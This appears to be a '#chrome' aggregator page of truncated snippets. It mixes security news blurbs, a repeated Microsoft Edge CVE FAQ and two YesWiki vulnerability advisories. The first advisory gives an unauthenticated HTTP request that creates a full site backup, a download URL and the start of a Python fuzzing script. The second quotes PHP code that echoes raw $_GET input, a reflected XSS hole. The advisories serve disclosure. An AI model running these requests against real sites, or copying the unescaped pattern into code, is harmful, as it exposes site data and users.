#chrome

### Summary The request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication. The archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated. ### Details Create an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for: ``` POST /?api/archives HTTP/1.1 Host: localhost:8085 action=startArchive&params%5Bsavefiles%5D=true&params%5Bsavedatabase%5D=true&callAsync=true ``` Then to retrieve it, make a simple `GET` request like to the correct URL: ``` http://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip ``` A malicious attacker could simply fuzz this filename. ### PoC Here is a python script to fuzz this: ``` #!/usr/bin/env python3 import requests import argpars...

### Summary Reflected XSS has been detected in the file upload form. Vulnerability can be exploited without authentication This Proof of Concept has been performed using the followings: - YesWiki v4.5.3 (doryphore-dev branch) - Docker environnment (docker/docker-compose.yml) ### Vulnerable code The vulnerability is located in the [file](https://github.com/YesWiki/yeswiki/blob/6894234bbde6ab168bf4253f9a581bd24bf53766/tools/attach/libs/attach.lib.php#L724-L735) ``` public function showUploadForm() { $this->file = $_GET['file']; echo '<h3>' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . "</h3>\n"; echo '<form enctype="multipart/form-data" name="frmUpload" method="POST" action="' . $this->wiki->href('upload', $this->wiki->GetPageTag()) . "\">\n" . ' <input type="hidden" name="wiki" value="' . $this->wiki->GetPageTag() . "/upload\" />\n" . ' <input type="hidden" name="MAX_FILE_SIZE" value="' . ...

AI search service Perplexity AI doesn't just want you using its app—it wants to take over your web browsing experience too.

AI search service Perplexity AI doesn't just want you using its app—it wants to take over your web browsing experience too.

Plus: Cybercriminals stole a record-breaking fortune from US residents and businesses in 2024, and Google performs its final flip-flop in its yearslong quest to kill tracking cookies.

Free up space on your iPhone fast. Learn 5 proven ways to clear storage, remove clutter, and manage photos, apps, and files with no gimmicks, just results.

Google on Tuesday revealed that it will no longer offer a standalone prompt for third-party cookies in its Chrome browser as part of its Privacy Sandbox initiative. "We've made the decision to maintain our current approach to offering users third-party cookie choice in Chrome, and will not be rolling out a new standalone prompt for third-party cookies," Anthony Chavez, vice president of Privacy

Government-backed hacking groups from North Korea (TA427), Iran (TA450), and Russia (UNK_RemoteRogue, TA422) are now using the ClickFix…

**Why is this Chrome CVE included in the Security Update Guide?** The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. **How can I see the version of the browser?** 1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window 2. Click on **Help and Feedback** 3. Click on **About Microsoft Edge**

**Why is this Chrome CVE included in the Security Update Guide?** The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. **How can I see the version of the browser?** 1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window 2. Click on **Help and Feedback** 3. Click on **About Microsoft Edge**